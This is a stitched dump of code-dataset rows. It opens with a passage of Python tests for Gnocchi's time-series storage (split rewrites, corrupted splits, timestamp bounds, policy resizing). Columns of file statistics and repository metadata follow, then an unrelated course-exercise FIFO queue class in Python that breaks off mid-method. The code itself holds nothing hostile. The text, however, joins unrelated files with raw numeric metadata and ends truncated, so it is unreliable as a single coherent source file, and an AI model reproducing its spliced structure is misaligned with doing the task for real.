    takes the rewrite code path for both the 60s and 1s granularities.
    """
    apname = str(uuid.uuid4())
    # Create an archive policy with two different granularities
    ap = archive_policy.ArchivePolicy(apname, 0, [(36000, 60), (36000, 1)])
    self.index.create_archive_policy(ap)
    self.metric = indexer.Metric(uuid.uuid4(), ap)
    self.index.create_metric(self.metric.id, str(uuid.uuid4()),
                             apname)
    # First store some points
    self.incoming.add_measures(self.metric.id, [
        incoming.Measure(datetime64(2016, 1, 6, 18, 15, 46), 43),
        incoming.Measure(datetime64(2016, 1, 6, 18, 15, 47), 43),
        incoming.Measure(datetime64(2016, 1, 6, 18, 15, 48), 43),
    ])
    self.trigger_processing()
    # Add some more points, mocking out WRITE_FULL attribute of the current
    # driver, so that rewrite happens
    self.incoming.add_measures(self.metric.id, [
        incoming.Measure(datetime64(2016, 1, 7, 18, 15, 49), 43),
        incoming.Measure(datetime64(2016, 1, 7, 18, 15, 50), 43),
        incoming.Measure(datetime64(2016, 1, 7, 18, 18, 46), 43),
    ])
    driver = storage.get_driver(self.conf)
    with mock.patch.object(driver.__class__, 'WRITE_FULL', False):
        self.trigger_processing()
def test_rewrite_measures_oldest_mutable_timestamp_eq_next_key(self):
    """See LP#1655422.

    Corner case of the split rewrite where the oldest mutable
    timestamp lands exactly on a new split key boundary
    (1452384000s == 2016-01-10T00:00:00).
    """
    # Create an archive policy that spans on several splits. Each split
    # being 3600 points, let's go for 36k points so we have 10 splits.
    apname = str(uuid.uuid4())
    ap = archive_policy.ArchivePolicy(apname, 0, [(36000, 60)])
    self.index.create_archive_policy(ap)
    self.metric = indexer.Metric(uuid.uuid4(), ap)
    self.index.create_metric(self.metric.id, str(uuid.uuid4()),
                             apname)
    # First store some points scattered across different splits
    self.incoming.add_measures(self.metric.id, [
        incoming.Measure(datetime64(2016, 1, 1, 12, 0, 1), 69),
        incoming.Measure(datetime64(2016, 1, 2, 13, 7, 31), 42),
        incoming.Measure(datetime64(2016, 1, 4, 14, 9, 31), 4),
        incoming.Measure(datetime64(2016, 1, 6, 15, 12, 45), 44),
    ])
    self.trigger_processing()
    agg = self.metric.archive_policy.get_aggregation(
        "mean", numpy.timedelta64(1, 'm'))
    # Three splits must exist after the first processing pass.
    self.assertEqual({
        self.metric: {
            agg: {
                carbonara.SplitKey(numpy.datetime64(1451520000, 's'),
                                   numpy.timedelta64(1, 'm')),
                carbonara.SplitKey(numpy.datetime64(1451736000, 's'),
                                   numpy.timedelta64(1, 'm')),
                carbonara.SplitKey(numpy.datetime64(1451952000, 's'),
                                   numpy.timedelta64(1, 'm')),
            },
        },
    }, self.storage._list_split_keys({self.metric: [agg]}))
    # Drivers that always write full splits compress them right away;
    # other drivers only compress a split once it is rewritten.
    if self.storage.WRITE_FULL:
        assertCompressedIfWriteFull = self.assertTrue
    else:
        assertCompressedIfWriteFull = self.assertFalse
    aggregation = self.metric.archive_policy.get_aggregation(
        "mean", numpy.timedelta64(1, 'm'))
    data = self.storage._get_splits(
        {self.metric: {
            aggregation: [carbonara.SplitKey(
                numpy.datetime64(1451520000, 's'),
                numpy.timedelta64(1, 'm'),
            )]}})[self.metric][aggregation][0]
    self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
    data = self.storage._get_splits(
        {self.metric: {
            aggregation: [carbonara.SplitKey(
                numpy.datetime64(1451736000, 's'),
                numpy.timedelta64(1, 'm'),
            )]}})[self.metric][aggregation][0]
    self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
    data = self.storage._get_splits(
        {self.metric: {aggregation: [carbonara.SplitKey(
            numpy.datetime64(1451952000, 's'),
            numpy.timedelta64(1, 'm')
        )]}})[self.metric][aggregation][0]
    assertCompressedIfWriteFull(
        carbonara.AggregatedTimeSerie.is_compressed(data))
    self.assertEqual({"mean": [
        (datetime64(2016, 1, 1, 12), numpy.timedelta64(1, 'm'), 69),
        (datetime64(2016, 1, 2, 13, 7), numpy.timedelta64(1, 'm'), 42),
        (datetime64(2016, 1, 4, 14, 9), numpy.timedelta64(1, 'm'), 4),
        (datetime64(2016, 1, 6, 15, 12), numpy.timedelta64(1, 'm'), 44),
    ]}, self.storage.get_measures(self.metric, [aggregation]))
    # Now store brand new points that should force a rewrite of one of the
    # split (keep in mind the back window size is one hour here). We move
    # the BoundTimeSerie processing timeserie far away from its current
    # range.
    # Here we test a special case where the oldest_mutable_timestamp will
    # be 2016-01-10T00:00:00 = 1452384000.0, our new split key.
    self.incoming.add_measures(self.metric.id, [
        incoming.Measure(datetime64(2016, 1, 10, 0, 12), 45),
    ])
    self.trigger_processing()
    agg = self.metric.archive_policy.get_aggregation(
        "mean", numpy.timedelta64(1, 'm'))
    self.assertEqual({
        self.metric: {
            agg: {
                carbonara.SplitKey(numpy.datetime64('2016-01-10T00:00:00'),
                                   numpy.timedelta64(1, 'm')),
                carbonara.SplitKey(numpy.datetime64('2016-01-02T12:00:00'),
                                   numpy.timedelta64(1, 'm')),
                carbonara.SplitKey(numpy.datetime64('2015-12-31T00:00:00'),
                                   numpy.timedelta64(1, 'm')),
                carbonara.SplitKey(numpy.datetime64('2016-01-05T00:00:00'),
                                   numpy.timedelta64(1, 'm')),
            },
        },
    }, self.storage._list_split_keys({self.metric: [agg]}))
    data = self.storage._get_splits({
        self.metric: {
            agg: [carbonara.SplitKey(
                numpy.datetime64(1451520000, 's'),
                numpy.timedelta64(1, 'm'),
            )]}})[self.metric][agg][0]
    self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
    data = self.storage._get_splits({
        self.metric: {
            agg: [carbonara.SplitKey(
                numpy.datetime64(1451736000, 's'),
                numpy.timedelta64(1, 'm'),
            )]}})[self.metric][agg][0]
    self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
    data = self.storage._get_splits({
        self.metric: {
            agg: [carbonara.SplitKey(
                numpy.datetime64(1451952000, 's'),
                numpy.timedelta64(60, 's')
            )]}})[self.metric][agg][0]
    # Now this one is compressed because it has been rewritten!
    self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
    data = self.storage._get_splits({
        self.metric: {
            agg: [carbonara.SplitKey(
                numpy.datetime64(1452384000, 's'),
                numpy.timedelta64(1, 'm'),
            )]}})[self.metric][agg][0]
    assertCompressedIfWriteFull(
        carbonara.AggregatedTimeSerie.is_compressed(data))
    self.assertEqual({"mean": [
        (datetime64(2016, 1, 1, 12), numpy.timedelta64(1, 'm'), 69),
        (datetime64(2016, 1, 2, 13, 7), numpy.timedelta64(1, 'm'), 42),
        (datetime64(2016, 1, 4, 14, 9), numpy.timedelta64(1, 'm'), 4),
        (datetime64(2016, 1, 6, 15, 12), numpy.timedelta64(1, 'm'), 44),
        (datetime64(2016, 1, 10, 0, 12), numpy.timedelta64(1, 'm'), 45),
    ]}, self.storage.get_measures(self.metric, [aggregation]))
def test_rewrite_measures_corruption_missing_file(self):
    """Rewrite must survive a split that was deleted from storage."""
    # Create an archive policy that spans on several splits. Each split
    # being 3600 points, let's go for 36k points so we have 10 splits.
    apname = str(uuid.uuid4())
    ap = archive_policy.ArchivePolicy(apname, 0, [(36000, 60)])
    self.index.create_archive_policy(ap)
    self.metric = indexer.Metric(uuid.uuid4(), ap)
    self.index.create_metric(self.metric.id, str(uuid.uuid4()),
                             apname)
    # First store some points scattered across different splits
    self.incoming.add_measures(self.metric.id, [
        incoming.Measure(datetime64(2016, 1, 1, 12, 0, 1), 69),
        incoming.Measure(datetime64(2016, 1, 2, 13, 7, 31), 42),
        incoming.Measure(datetime64(2016, 1, 4, 14, 9, 31), 4),
        incoming.Measure(datetime64(2016, 1, 6, 15, 12, 45), 44),
    ])
    self.trigger_processing()
    agg = self.metric.archive_policy.get_aggregation(
        "mean", numpy.timedelta64(1, 'm'))
    self.assertEqual({
        self.metric: {
            agg: {
                carbonara.SplitKey(numpy.datetime64('2015-12-31T00:00:00'),
                                   numpy.timedelta64(1, 'm')),
                carbonara.SplitKey(numpy.datetime64('2016-01-02T12:00:00'),
                                   numpy.timedelta64(1, 'm')),
                carbonara.SplitKey(numpy.datetime64('2016-01-05T00:00:00'),
                                   numpy.timedelta64(1, 'm')),
            },
        },
    }, self.storage._list_split_keys({self.metric: [agg]}))
    # WRITE_FULL drivers compress every split; others only compress
    # rewritten splits.
    if self.storage.WRITE_FULL:
        assertCompressedIfWriteFull = self.assertTrue
    else:
        assertCompressedIfWriteFull = self.assertFalse
    aggregation = self.metric.archive_policy.get_aggregation(
        "mean", numpy.timedelta64(1, 'm'))
    data = self.storage._get_splits({
        self.metric: {
            aggregation:
            [carbonara.SplitKey(
                numpy.datetime64(1451520000, 's'),
                numpy.timedelta64(1, 'm'),
            )]}})[self.metric][aggregation][0]
    self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
    data = self.storage._get_splits({
        self.metric: {
            aggregation: [carbonara.SplitKey(
                numpy.datetime64(1451736000, 's'),
                numpy.timedelta64(1, 'm')
            )]}})[self.metric][aggregation][0]
    self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
    data = self.storage._get_splits({
        self.metric: {
            aggregation: [carbonara.SplitKey(
                numpy.datetime64(1451952000, 's'),
                numpy.timedelta64(1, 'm'),
            )]}})[self.metric][aggregation][0]
    assertCompressedIfWriteFull(
        carbonara.AggregatedTimeSerie.is_compressed(data))
    self.assertEqual({"mean": [
        (datetime64(2016, 1, 1, 12),
         numpy.timedelta64(1, 'm'), 69),
        (datetime64(2016, 1, 2, 13, 7),
         numpy.timedelta64(1, 'm'), 42),
        (datetime64(2016, 1, 4, 14, 9),
         numpy.timedelta64(1, 'm'), 4),
        (datetime64(2016, 1, 6, 15, 12),
         numpy.timedelta64(1, 'm'), 44),
    ]}, self.storage.get_measures(self.metric, [aggregation]))
    # Test what happens if we delete the latest split and then need to
    # compress it!
    self.storage._delete_metric_splits(
        {self.metric: [(carbonara.SplitKey(
            numpy.datetime64(1451952000, 's'),
            numpy.timedelta64(1, 'm'),
        ), aggregation)]})
    # Now store brand new points that should force a rewrite of one of the
    # split (keep in mind the back window size in one hour here). We move
    # the BoundTimeSerie processing timeserie far away from its current
    # range.
    self.incoming.add_measures(self.metric.id, [
        incoming.Measure(datetime64(2016, 1, 10, 16, 18, 45), 45),
        incoming.Measure(datetime64(2016, 1, 10, 17, 12, 45), 46),
    ])
    self.trigger_processing()
def test_rewrite_measures_corruption_bad_data(self):
    """Rewrite must survive a split whose stored payload is garbage."""
    # Create an archive policy that spans on several splits. Each split
    # being 3600 points, let's go for 36k points so we have 10 splits.
    apname = str(uuid.uuid4())
    ap = archive_policy.ArchivePolicy(apname, 0, [(36000, 60)])
    self.index.create_archive_policy(ap)
    self.metric = indexer.Metric(uuid.uuid4(), ap)
    self.index.create_metric(self.metric.id, str(uuid.uuid4()),
                             apname)
    # First store some points scattered across different splits
    self.incoming.add_measures(self.metric.id, [
        incoming.Measure(datetime64(2016, 1, 1, 12, 0, 1), 69),
        incoming.Measure(datetime64(2016, 1, 2, 13, 7, 31), 42),
        incoming.Measure(datetime64(2016, 1, 4, 14, 9, 31), 4),
        incoming.Measure(datetime64(2016, 1, 6, 15, 12, 45), 44),
    ])
    self.trigger_processing()
    agg = self.metric.archive_policy.get_aggregation(
        "mean", numpy.timedelta64(1, 'm'))
    self.assertEqual({
        self.metric: {
            agg: {
                carbonara.SplitKey(numpy.datetime64(1451520000, 's'),
                                   numpy.timedelta64(1, 'm')),
                carbonara.SplitKey(numpy.datetime64(1451736000, 's'),
                                   numpy.timedelta64(1, 'm')),
                carbonara.SplitKey(numpy.datetime64(1451952000, 's'),
                                   numpy.timedelta64(1, 'm')),
            },
        },
    }, self.storage._list_split_keys({self.metric: [agg]}))
    # WRITE_FULL drivers compress every split; others only compress
    # rewritten splits.
    if self.storage.WRITE_FULL:
        assertCompressedIfWriteFull = self.assertTrue
    else:
        assertCompressedIfWriteFull = self.assertFalse
    aggregation = self.metric.archive_policy.get_aggregation(
        "mean", numpy.timedelta64(1, 'm'))
    data = self.storage._get_splits({
        self.metric: {
            aggregation: [carbonara.SplitKey(
                numpy.datetime64(1451520000, 's'),
                numpy.timedelta64(60, 's'),
            )]}})[self.metric][aggregation][0]
    self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
    data = self.storage._get_splits({
        self.metric: {
            aggregation: [carbonara.SplitKey(
                numpy.datetime64(1451736000, 's'),
                numpy.timedelta64(1, 'm'),
            )]}})[self.metric][aggregation][0]
    self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
    data = self.storage._get_splits({
        self.metric: {
            aggregation: [carbonara.SplitKey(
                numpy.datetime64(1451952000, 's'),
                numpy.timedelta64(1, 'm'),
            )]}})[self.metric][aggregation][0]
    assertCompressedIfWriteFull(
        carbonara.AggregatedTimeSerie.is_compressed(data))
    self.assertEqual({"mean": [
        (datetime64(2016, 1, 1, 12), numpy.timedelta64(1, 'm'), 69),
        (datetime64(2016, 1, 2, 13, 7), numpy.timedelta64(1, 'm'), 42),
        (datetime64(2016, 1, 4, 14, 9), numpy.timedelta64(1, 'm'), 4),
        (datetime64(2016, 1, 6, 15, 12), numpy.timedelta64(1, 'm'), 44),
    ]}, self.storage.get_measures(self.metric, [aggregation]))
    # Test what happens if we write garbage
    self.storage._store_metric_splits({
        self.metric: [
            (carbonara.SplitKey(
                numpy.datetime64(1451952000, 's'),
                numpy.timedelta64(1, 'm')),
             aggregation, b"oh really?", None),
        ]})
    # Now store brand new points that should force a rewrite of one of the
    # split (keep in mind the back window size in one hour here). We move
    # the BoundTimeSerie processing timeserie far away from its current
    # range.
    self.incoming.add_measures(self.metric.id, [
        incoming.Measure(datetime64(2016, 1, 10, 16, 18, 45), 45),
        incoming.Measure(datetime64(2016, 1, 10, 17, 12, 45), 46),
    ])
    self.trigger_processing()
def test_updated_measures(self):
    """New measures landing in existing spans refresh the aggregates."""
    self.incoming.add_measures(self.metric.id, [
        incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 69),
        incoming.Measure(datetime64(2014, 1, 1, 12, 7, 31), 42),
    ])
    self.trigger_processing()
    aggregations = (
        self.metric.archive_policy.get_aggregations_for_method("mean")
    )
    self.assertEqual({"mean": [
        (datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 55.5),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 55.5),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69),
        (datetime64(2014, 1, 1, 12, 5), numpy.timedelta64(5, 'm'), 42.0),
    ]}, self.storage.get_measures(self.metric, aggregations))
    # Two more points: the daily/hourly means and the 12:05 span must be
    # recomputed, and a new 12:10 span appears.
    self.incoming.add_measures(self.metric.id, [
        incoming.Measure(datetime64(2014, 1, 1, 12, 9, 31), 4),
        incoming.Measure(datetime64(2014, 1, 1, 12, 12, 45), 44),
    ])
    self.trigger_processing()
    self.assertEqual({"mean": [
        (datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 39.75),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
        (datetime64(2014, 1, 1, 12, 5), numpy.timedelta64(5, 'm'), 23.0),
        (datetime64(2014, 1, 1, 12, 10), numpy.timedelta64(5, 'm'), 44.0),
    ]}, self.storage.get_measures(self.metric, aggregations))
    aggregations = (
        self.metric.archive_policy.get_aggregations_for_method("max")
    )
    self.assertEqual({"max": [
        (datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 69),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 69.0),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
        (datetime64(2014, 1, 1, 12, 5), numpy.timedelta64(5, 'm'), 42.0),
        (datetime64(2014, 1, 1, 12, 10), numpy.timedelta64(5, 'm'), 44.0),
    ]}, self.storage.get_measures(self.metric, aggregations))
    aggregations = (
        self.metric.archive_policy.get_aggregations_for_method("min")
    )
    self.assertEqual({"min": [
        (datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 4),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 4),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
        (datetime64(2014, 1, 1, 12, 5), numpy.timedelta64(5, 'm'), 4.0),
        (datetime64(2014, 1, 1, 12, 10), numpy.timedelta64(5, 'm'), 44.0),
    ]}, self.storage.get_measures(self.metric, aggregations))
def test_add_and_get_splits(self):
    """get_measures honours from/to timestamp bounds per granularity."""
    self.incoming.add_measures(self.metric.id, [
        incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 69),
        incoming.Measure(datetime64(2014, 1, 1, 12, 7, 31), 42),
        incoming.Measure(datetime64(2014, 1, 1, 12, 9, 31), 4),
        incoming.Measure(datetime64(2014, 1, 1, 12, 12, 45), 44),
    ])
    self.trigger_processing()
    aggregations = (
        self.metric.archive_policy.get_aggregations_for_method("mean")
    )
    # No bounds: everything comes back.
    self.assertEqual({"mean": [
        (datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 39.75),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
        (datetime64(2014, 1, 1, 12, 5), numpy.timedelta64(5, 'm'), 23.0),
        (datetime64(2014, 1, 1, 12, 10), numpy.timedelta64(5, 'm'), 44.0),
    ]}, self.storage.get_measures(self.metric, aggregations))
    # Bounds apply per granularity: coarse spans containing the bound
    # are still returned.
    self.assertEqual({"mean": [
        (datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 39.75),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
        (datetime64(2014, 1, 1, 12, 10), numpy.timedelta64(5, 'm'), 44.0),
    ]}, self.storage.get_measures(
        self.metric, aggregations,
        from_timestamp=datetime64(2014, 1, 1, 12, 10, 0)))
    self.assertEqual({"mean": [
        (datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 39.75),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
        (datetime64(2014, 1, 1, 12, 5), numpy.timedelta64(5, 'm'), 23.0),
    ]}, self.storage.get_measures(
        self.metric, aggregations,
        to_timestamp=datetime64(2014, 1, 1, 12, 6, 0)))
    self.assertEqual({"mean": [
        (datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 39.75),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
        (datetime64(2014, 1, 1, 12, 10), numpy.timedelta64(5, 'm'), 44.0),
    ]}, self.storage.get_measures(
        self.metric, aggregations,
        to_timestamp=datetime64(2014, 1, 1, 12, 10, 10),
        from_timestamp=datetime64(2014, 1, 1, 12, 10, 10)))
    self.assertEqual({"mean": [
        (datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 39.75),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
    ]}, self.storage.get_measures(
        self.metric, aggregations,
        from_timestamp=datetime64(2014, 1, 1, 12, 0, 0),
        to_timestamp=datetime64(2014, 1, 1, 12, 0, 2)))
    self.assertEqual({"mean": [
        (datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 39.75),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
    ]}, self.storage.get_measures(
        self.metric, aggregations,
        from_timestamp=datetime64(2014, 1, 1, 12),
        to_timestamp=datetime64(2014, 1, 1, 12, 0, 2)))
    # Single-granularity queries.
    aggregation_1h = (
        self.metric.archive_policy.get_aggregation(
            "mean", numpy.timedelta64(1, 'h'))
    )
    self.assertEqual({"mean": [
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
    ]}, self.storage.get_measures(
        self.metric, [aggregation_1h],
        from_timestamp=datetime64(2014, 1, 1, 12, 0, 0),
        to_timestamp=datetime64(2014, 1, 1, 12, 0, 2)))
    aggregation_5m = (
        self.metric.archive_policy.get_aggregation(
            "mean", numpy.timedelta64(5, 'm'))
    )
    self.assertEqual({"mean": [
        (datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
    ]}, self.storage.get_measures(
        self.metric, [aggregation_5m],
        from_timestamp=datetime64(2014, 1, 1, 12, 0, 0),
        to_timestamp=datetime64(2014, 1, 1, 12, 0, 2)))
    # An aggregation absent from the policy yields no points.
    self.assertEqual({"mean": []},
                     self.storage.get_measures(
                         self.metric,
                         [carbonara.Aggregation(
                             "mean", numpy.timedelta64(42, 's'), None)]))
def test_get_measure_unknown_aggregation(self):
    """Fetching an aggregation method with no stored data raises.

    The measures are added but never processed, so asking for the
    "last" aggregations raises MetricDoesNotExist.
    """
    self.incoming.add_measures(self.metric.id, [
        incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 69),
        incoming.Measure(datetime64(2014, 1, 1, 12, 7, 31), 42),
        incoming.Measure(datetime64(2014, 1, 1, 12, 9, 31), 4),
        incoming.Measure(datetime64(2014, 1, 1, 12, 12, 45), 44),
    ])
    aggregations = (
        self.metric.archive_policy.get_aggregations_for_method("last")
    )
    self.assertRaises(
        storage.MetricDoesNotExist,
        self.storage.get_measures,
        self.metric, aggregations)
def test_resize_policy(self):
    """Resizing an archive policy: grow keeps points, shrink drops oldest."""
    name = str(uuid.uuid4())
    # Start with 3 points at 5-second granularity.
    ap = archive_policy.ArchivePolicy(name, 0, [(3, 5)])
    self.index.create_archive_policy(ap)
    m = self.index.create_metric(uuid.uuid4(), str(uuid.uuid4()), name)
    m = self.index.list_metrics(attribute_filter={"=": {"id": m.id}})[0]
    self.incoming.add_measures(m.id, [
        incoming.Measure(datetime64(2014, 1, 1, 12, 0, 0), 1),
        incoming.Measure(datetime64(2014, 1, 1, 12, 0, 5), 1),
        incoming.Measure(datetime64(2014, 1, 1, 12, 0, 10), 1),
    ])
    self.trigger_processing([m])
    aggregation = m.archive_policy.get_aggregation(
        "mean", numpy.timedelta64(5, 's'))
    self.assertEqual({"mean": [
        (datetime64(2014, 1, 1, 12, 0, 0), numpy.timedelta64(5, 's'), 1),
        (datetime64(2014, 1, 1, 12, 0, 5), numpy.timedelta64(5, 's'), 1),
        (datetime64(2014, 1, 1, 12, 0, 10), numpy.timedelta64(5, 's'), 1),
    ]}, self.storage.get_measures(m, [aggregation]))
    # expand to more points
    self.index.update_archive_policy(
        name, [archive_policy.ArchivePolicyItem(granularity=5, points=6)])
    m = self.index.list_metrics(attribute_filter={"=": {"id": m.id}})[0]
    self.incoming.add_measures(m.id, [
        incoming.Measure(datetime64(2014, 1, 1, 12, 0, 15), 1),
    ])
    self.trigger_processing([m])
    self.assertEqual({"mean": [
        (datetime64(2014, 1, 1, 12, 0, 5), numpy.timedelta64(5, 's'), 1),
        (datetime64(2014, 1, 1, 12, 0, 10), numpy.timedelta64(5, 's'), 1),
        (datetime64(2014, 1, 1, 12, 0, 15), numpy.timedelta64(5, 's'), 1),
    ]}, self.storage.get_measures(m, [aggregation]))
    # shrink timespan
    self.index.update_archive_policy(
        name, [archive_policy.ArchivePolicyItem(granularity=5, points=2)])
    m = self.index.list_metrics(attribute_filter={"=": {"id": m.id}})[0]
    aggregation = m.archive_policy.get_aggregation(
        "mean", numpy.timedelta64(5, 's'))
    # Only the two most recent points survive the shrink.
    self.assertEqual({"mean": [
        (datetime64(2014, 1, 1, 12, 0, 10), numpy.timedelta64(5, 's'), 1),
        (datetime64(2014, 1, 1, 12, 0, 15), numpy.timedelta64(5, 's'), 1),
    ]}, self.storage.get_measures(m, [aggregation]))
def test_resample_no_metric(self):
    """https://github.com/gnocchixyz/gnocchi/issues/69

    Resampling a metric that has no stored data must raise
    MetricDoesNotExist rather than crash.
    """
    aggregation = self.metric.archive_policy.get_aggregation(
        "mean", numpy.timedelta64(300, 's'))
    self.assertRaises(storage.MetricDoesNotExist,
                      self.storage.get_measures,
                      self.metric,
                      [aggregation],
                      datetime64(2014, 1, 1),
                      datetime64(2015, 1, 1),
                      resample=numpy.timedelta64(1, 'h'))
| 45.129721
| 79
| 0.562036
| 6,092
| 54,968
| 4.980466
| 0.068122
| 0.058007
| 0.054382
| 0.055898
| 0.856992
| 0.833427
| 0.821034
| 0.803335
| 0.788174
| 0.762368
| 0
| 0.106902
| 0.303122
| 54,968
| 1,217
| 80
| 45.166804
| 0.685062
| 0.060963
| 0
| 0.727094
| 0
| 0.000985
| 0.026271
| 0.009216
| 0
| 0
| 0
| 0
| 0.137931
| 1
| 0.028571
| false
| 0.000985
| 0.015764
| 0.000985
| 0.046305
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7db248952443c6d0ebcd4b59a7607dcacdbdeba3
| 4,524
|
py
|
Python
|
CS225/myCode/queue.py
|
debugevent90901/courseArchive
|
1585c9a0f4a1884c143973dcdf416514eb30aded
|
[
"MIT"
] | null | null | null |
CS225/myCode/queue.py
|
debugevent90901/courseArchive
|
1585c9a0f4a1884c143973dcdf416514eb30aded
|
[
"MIT"
] | null | null | null |
CS225/myCode/queue.py
|
debugevent90901/courseArchive
|
1585c9a0f4a1884c143973dcdf416514eb30aded
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
class Fifo:
    """Ring-buffer FIFO queue that doubles when full and halves when sparse.

    `items` is the backing circular buffer, `first` the index of the
    oldest element, `last` the index of the newest (-1 before any push),
    and `length` the current element count.
    """

    def __init__(self, size=20):
        self.items = [None] * size
        self.first = 0
        self.last = -1
        self.size = size
        self.length = 0

    def computelength(self):
        """Recompute `length` from the ring indices.

        The indices alone cannot distinguish an empty queue from a full
        one (both satisfy (last + 1) % size == first), so in that
        ambiguous case the incrementally maintained count is kept.
        BUG FIX: the original used `last > first`, miscounting the
        single-element case, and reported a full queue after popping the
        final element.
        """
        if (self.last + 1) % self.size == self.first:
            return  # ambiguous empty/full state: trust the running count
        if self.last >= self.first:
            self.length = self.last - self.first + 1
        else:
            self.length = self.last - self.first + 1 + self.size

    def isEmpty(self):
        """Return True when the queue holds no elements."""
        return self.length == 0

    def front(self):
        """Return (without removing) the oldest element.

        Raises ValueError when the queue is empty.
        """
        if self.length != 0:
            return self.items[self.first]
        raise ValueError("Queue is empty")

    def back(self):
        """Return (without removing) the newest element.

        Raises ValueError when the queue is empty.
        BUG FIX: this used to return the *front* element
        (items[self.first]) instead of the back one.
        """
        if self.length != 0:
            return self.items[self.last]
        raise ValueError("Queue is empty")

    def pushback(self, item):
        """Append `item` at the back, growing the buffer when full."""
        if self.length == self.size:
            self.allocate()
        self.last = (self.last + 1) % self.size
        self.items[self.last] = item
        self.length += 1
        self.computelength()

    def popfront(self):
        """Remove and return the oldest element.

        Shrinks the buffer when occupancy drops to a quarter.
        Raises ValueError when the queue is empty.
        """
        if self.length == self.size // 4:
            self.deallocate()
        if self.length != 0:
            frontelement = self.items[self.first]
            self.first = (self.first + 1) % self.size
            self.length -= 1
            self.computelength()
            return frontelement
        raise ValueError("Queue is empty")

    def allocate(self):
        """Double the buffer, compacting elements to the start."""
        newlength = 2 * self.size
        newQueue = [None] * newlength
        for i in range(self.size):
            pos = (i + self.first) % self.size
            newQueue[i] = self.items[pos]
        self.items = newQueue
        self.first = 0
        self.last = self.size - 1
        self.size = newlength
        self.computelength()

    def deallocate(self):
        """Halve the buffer (never below 1 slot), compacting elements."""
        # BUG FIX: guard so repeated shrinking cannot reach size 0.
        newlength = max(1, self.size // 2)
        newQueue = [None] * newlength
        length = self.length
        for i in range(length):
            pos = (i + self.first) % self.size
            newQueue[i] = self.items[pos]
        self.items = newQueue
        self.first = 0
        self.last = length - 1
        self.size = newlength
        self.computelength()

    def __iter__(self):
        """Yield elements from oldest to newest."""
        rlast = self.first + self.length
        for i in range(self.first, rlast):
            yield self.items[i % self.size]
class Fifo_GRAPH:
    """Ring-buffer FIFO queue (graph-traversal variant of Fifo).

    Same contract as Fifo: circular buffer `items`, `first` pointing to
    the oldest element, `last` to the newest (-1 before any push), and
    `length` the current element count.
    """

    def __init__(self, size=20):
        self.items = [None] * size
        self.first = 0
        self.last = -1
        self.size = size
        self.length = 0

    def computelength(self):
        """Recompute `length` from the ring indices.

        (last + 1) % size == first is ambiguous (empty or full), so in
        that case the incrementally maintained count is kept; this fixes
        the pop-to-empty state that previously reported a full queue.
        """
        if (self.last + 1) % self.size == self.first:
            return  # ambiguous empty/full state: trust the running count
        if self.last >= self.first:
            self.length = self.last - self.first + 1
        else:
            self.length = self.last - self.first + 1 + self.size

    def isEmpty(self):
        """Return True when the queue holds no elements."""
        return self.length == 0

    def front(self):
        """Return (without removing) the oldest element.

        Raises ValueError when the queue is empty.
        BUG FIX: used to return items[self.last] (the newest element)
        and raised the undefined name `Error` (a NameError at runtime).
        """
        if self.length != 0:
            return self.items[self.first]
        raise ValueError("Queue is empty")

    def back(self):
        """Return (without removing) the newest element.

        Raises ValueError when the queue is empty.
        BUG FIX: used to return items[self.first] (the oldest element).
        """
        if self.length != 0:
            return self.items[self.last]
        raise ValueError("Queue is empty")

    def pushback(self, item):
        """Append `item` at the back, growing the buffer when full."""
        if self.length == self.size:
            self.allocate()
